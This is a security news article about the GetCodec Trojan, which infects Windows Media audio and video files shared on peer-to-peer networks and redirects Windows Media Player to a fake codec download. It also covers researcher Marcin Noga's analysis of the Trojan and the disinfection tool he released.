Article

Researcher disinfects multimedia Trojans

Robert Westervelt, News Director

A Polish security researcher who is investigating how attackers are using a multimedia Trojan to infect audio and video files on peer-to-peer networks, has created a tool to cure infected files.

    Requires Free Membership to View

 This is yet another example of how the combination of technique and social engineering is a nice cocktail when aiming at high propagation rates.
Marcin Noga,
security researcherHispasec Sistemas

Marcin Noga, a security researcher with Hispasec Sistemas, said the multimedia Trojan, which was discovered by antivirus vendors in July, has the ability to dupe antivirus vendors.

The Trojan, dubbed GetCodec, is written to embed itself in Microsoft's Advanced Systems Format (ASF), infecting Windows Media Audio (WMA) and Windows Media Video (WMV) files. When an infected media file is opened, the Windows Media Player is redirected to a malicious site hosting a fake codec and malware.

According to Noga's reverse engineering analysis, the malware makers can change the URL for the coder/decoder (codec) download on the server side, delivering any type of content and updating the file as quickly as antivirus vendors update their signatures. So far, it's been successfully spreading throughout P2P networks and could be a menace in corporate environments, government agencies and schools, Noga said.

"This is yet another example of how the combination of technique and social engineering is a nice cocktail when aiming at high propagation rates," Noga wrote in a research paper entitled "GetCodec Multimedia Trojan Analysis."

Noga released a multimedia Trojan disinfector that he says could cure infected files.

In an email exchange, Noga said the GetCodec Trojan isn't complicated and appeared to have unfinished code. Currently the Trojan is infecting files at very low levels, he said.

"The author used standard Windows API's and appropriate COM interfeces to search and manipulate data," Noga said. "It didn't contain an anti-debug mechanism or a Virtual Machine detection technique, which I have the 'pleasure' to often see in bank Trojans."

Researchers at Secure Computing Corp. were one of the first to spot the new media Trojan. A similar attack was detected in May when McAfee Inc. discovered infections on more than 360,000 machines.


There are Comments. Add yours.

 
TIP: Want to include a code block in your comment? Use <pre> or <code> tags around the desired text. Ex: <code>insert code</code>

REGISTER or login:

Forgot Password?
By submitting you agree to receive email from TechTarget and its partners. If you reside outside of the United States, you consent to having your personal data transferred to and processed in the United States. Privacy
Sort by: OldestNewest

Forgot Password?

No problem! Submit your e-mail address below. We'll send you an email containing your password.

Your password has been sent to: